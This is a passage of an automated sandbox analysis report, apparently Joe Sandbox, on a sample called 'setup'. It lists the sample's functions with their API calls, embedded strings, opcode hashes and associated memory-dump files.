                                                                                                    • API ID: CloseHandleMessageMutexReleasewcslen$CreateFullNamePathProcessmbstowcswcsncmp
                                                                                                    • String ID: %ls\%ls
                                                                                                    • API String ID: 2636176469-2125769799
                                                                                                    • Opcode ID: 76a3c9c1fde40c0b35b9a9997d7c8ad9503024dfcb49cb8f963c01f8619e4016
                                                                                                    • Instruction ID: f7d29537861a1ddd6de8de516b0e3d73b656757d6d5e910ebb468ad7eee1a2d4
                                                                                                    • Opcode Fuzzy Hash: 76a3c9c1fde40c0b35b9a9997d7c8ad9503024dfcb49cb8f963c01f8619e4016
                                                                                                    • Instruction Fuzzy Hash: AC21EFB06097059FD700EF29DA8864EBBF0BB88704F01892DE98887311E775E948CF86
                                                                                                    APIs
                                                                                                      • Part of subcall function 002764C0: calloc.MSVCRT ref: 0027654E
                                                                                                    • TlsAlloc.KERNEL32(?,00000000,00000004,00277612), ref: 00276B57
                                                                                                    • fprintf.MSVCRT ref: 00276BC1
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 003329A1
                                                                                                    • abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,00000004,774CDF20,002776AD), ref: 003329A6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: abort$Alloccallocfprintf
                                                                                                    • String ID: once %p is %d
                                                                                                    • API String ID: 4948393-95064319
                                                                                                    • Opcode ID: c401bfa2a02bb2c3ae7617f498b3ba7ad5a591dc992875e3c72cb3501a4522d3
                                                                                                    • Instruction ID: 0bd7e643d8ee1a3e1bfb7a9233c4c3560fabd57a49ea4059881f11eed7dea063
                                                                                                    • Opcode Fuzzy Hash: c401bfa2a02bb2c3ae7617f498b3ba7ad5a591dc992875e3c72cb3501a4522d3
                                                                                                    • Instruction Fuzzy Hash: 591170B11147019FD311EF2CE88975DBBE4FB81315F01852EE599D3322E77898198F52
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$callocfree
                                                                                                    • String ID: Win32: Failed to convert string to UTF-8
                                                                                                    • API String ID: 1064854850-2776438994
                                                                                                    • Opcode ID: 2f21c855c6cc5ca111365b9f8d6fff62995433f34f4b626f832e6b11ecc17796
                                                                                                    • Instruction ID: 73a71d7fc5e2103d7ca20d936a8598cdc02e353d8dd9e03e86fd3b54d3a157d6
                                                                                                    • Opcode Fuzzy Hash: 2f21c855c6cc5ca111365b9f8d6fff62995433f34f4b626f832e6b11ecc17796
                                                                                                    • Instruction Fuzzy Hash: 9A11F6B04193029BD314AF66C55831FBFE0AF84754F118A1DE8E84B280D7B99998DFD3
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle$CreateObjectProcessSingleWait
                                                                                                    • String ID: D
                                                                                                    • API String ID: 2059082233-2746444292
                                                                                                    • Opcode ID: 626525c870e5180b9ea32186996e9b65e74fa43f734ac220bcbf5765efdfada3
                                                                                                    • Instruction ID: 700427c3f70957dc1c1aef8bbcfe8d7a3be1421a4f866378e17d5d07ff55463b
                                                                                                    • Opcode Fuzzy Hash: 626525c870e5180b9ea32186996e9b65e74fa43f734ac220bcbf5765efdfada3
                                                                                                    • Instruction Fuzzy Hash: 1F21A0B05083419FE710EF69D59870FBBF0BB85304F408A2CE59887290E7BAD9498B83
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDeleteDeviceGammaRampstrcpy
                                                                                                    • String ID: DISPLAY$Win32: Gamma ramp size must be 256
                                                                                                    • API String ID: 3777951602-1165277357
                                                                                                    • Opcode ID: c9476641a28ccae6650e2325df8d43797524065a9fae8460754f1bcdc247d753
                                                                                                    • Instruction ID: 4a64d68de564d53278e5bbb043ac85850e982d2023cea6edac316a86ae5b689e
                                                                                                    • Opcode Fuzzy Hash: c9476641a28ccae6650e2325df8d43797524065a9fae8460754f1bcdc247d753
                                                                                                    • Instruction Fuzzy Hash: AF114CB28047048FE710EF68E54879ABBE1FFC5320F45892DE88857254D7B59898CB82
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • ------------------------------------------------------------, xrefs: 002021BD, 002021F5
                                                                                                    • Error: insufficient memory available%s, xrefs: 002021FD
                                                                                                    • Error: file is corrupted%s, xrefs: 002021C5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: exit
                                                                                                    • String ID: Error: file is corrupted%s$Error: insufficient memory available%s$------------------------------------------------------------
                                                                                                    • API String ID: 2483651598-137132821
                                                                                                    • Opcode ID: 939c83617f767e330ce6827f38b681f36a2cf45a148e32ac0e43fa1bb23e0ae1
                                                                                                    • Instruction ID: 246d3e6d22d21109745c3af15de9debf8eb11b0b27250f05073da846dd46bb2a
                                                                                                    • Opcode Fuzzy Hash: 939c83617f767e330ce6827f38b681f36a2cf45a148e32ac0e43fa1bb23e0ae1
                                                                                                    • Instruction Fuzzy Hash: BE014BB56197009BD711AF62D80A36EBBE0BF41345F01C82DD8CC97252CB74A4588F92
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$malloc$Char_closelongjmp
                                                                                                    • String ID: %s$ERROR: can't close file %s
                                                                                                    • API String ID: 4226686182-2251370396
                                                                                                    • Opcode ID: cfe2d3ad812f8137ff44ada194b1899f85b7ff13d7a72690560a9a8106f7bbeb
                                                                                                    • Instruction ID: df59f3bbf26e8d175c8954f85e610659358261ccdad10badd6b61da60a6ca4d3
                                                                                                    • Opcode Fuzzy Hash: cfe2d3ad812f8137ff44ada194b1899f85b7ff13d7a72690560a9a8106f7bbeb
                                                                                                    • Instruction Fuzzy Hash: 82F0F9B490CB159BC711AF25C58122EB7E1BF45340F12C82CE9C89B205DB74C8809F86
                                                                                                    APIs
                                                                                                    • EnterCriticalSection.KERNEL32 ref: 001F0BE9
                                                                                                    • EnterCriticalSection.KERNEL32 ref: 001F0D6F
                                                                                                    • LeaveCriticalSection.KERNEL32 ref: 001F0D8B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$Enter$Leave
                                                                                                    • String ID: read$seek_input
                                                                                                    • API String ID: 2801635615-1189155391
                                                                                                    • Opcode ID: 5eaad6bdffea39b0d0c432aaee941e13be53b3b28f5f0792f64f1548367a007c
                                                                                                    • Instruction ID: 3f114dc2432241c8ec042fce47419cce4c68bf1f96a515e65118668fd99acd1b
                                                                                                    • Opcode Fuzzy Hash: 5eaad6bdffea39b0d0c432aaee941e13be53b3b28f5f0792f64f1548367a007c
                                                                                                    • Instruction Fuzzy Hash: AB020A75908355DFD710CF28C48065ABBE1BF88368F1A8A6DF9A8A7351D335E845CF81
                                                                                                    APIs
                                                                                                      • Part of subcall function 00221D09: memset.MSVCRT ref: 00221D27
                                                                                                      • Part of subcall function 00221D09: memcpy.MSVCRT(-00000006,?,?,?,0000F000,00225512,-00000006,?,?,?,00000000), ref: 00221D54
                                                                                                    • memset.MSVCRT ref: 00224F49
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$memcpy
                                                                                                    • String ID: @$@$@$SCRS
                                                                                                    • API String ID: 368790112-1523600638
                                                                                                    • Opcode ID: 94e573370c584e89c1c08a60917127d9655999b617a89648cb50d4d4746e132f
                                                                                                    • Instruction ID: fdc2cfacfcc58ffc06cd7e1cc949fc4f6b550f127748530f7d445162f8e7916e
                                                                                                    • Opcode Fuzzy Hash: 94e573370c584e89c1c08a60917127d9655999b617a89648cb50d4d4746e132f
                                                                                                    • Instruction Fuzzy Hash: 37D147704287A2AFD330EFA8E441726BBF0BF95304F048A2EE9D586592D774E525CF52
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 002252EB
                                                                                                    • memcpy.MSVCRT(00000000,?,?,?,?,?,00000000), ref: 0022534B
                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,00000000), ref: 00225360
                                                                                                    • memset.MSVCRT ref: 00225404
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset
                                                                                                    • String ID: OggS
                                                                                                    • API String ID: 1297977491-2004203516
                                                                                                    • Opcode ID: b9bca6b851bab3e5cf7448ff428d45c06dbc2eb0d6a06bcff3bc5244b7277f43
                                                                                                    • Instruction ID: f6cd0d5c33cf7ee9a3d2fc253ef508d4f28317f40097df2d7fa0c83f68c7e82a
                                                                                                    • Opcode Fuzzy Hash: b9bca6b851bab3e5cf7448ff428d45c06dbc2eb0d6a06bcff3bc5244b7277f43
                                                                                                    • Instruction Fuzzy Hash: C1810A71930A31BBD724EFA8EC41BA9B3A5BF04310F148265E905E7691D774EDB0DB50
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
